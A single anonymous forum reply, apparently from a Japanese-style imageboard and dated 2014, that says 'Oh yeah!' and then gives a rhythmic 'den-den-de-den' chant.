DNS Unregistered-san:2014/12/07(Sun) 13:06:47.58 ID:HrjB81yF
Oh yeah!
Den-den-de-den, den-den-de-den, den-den-de-den, den, den!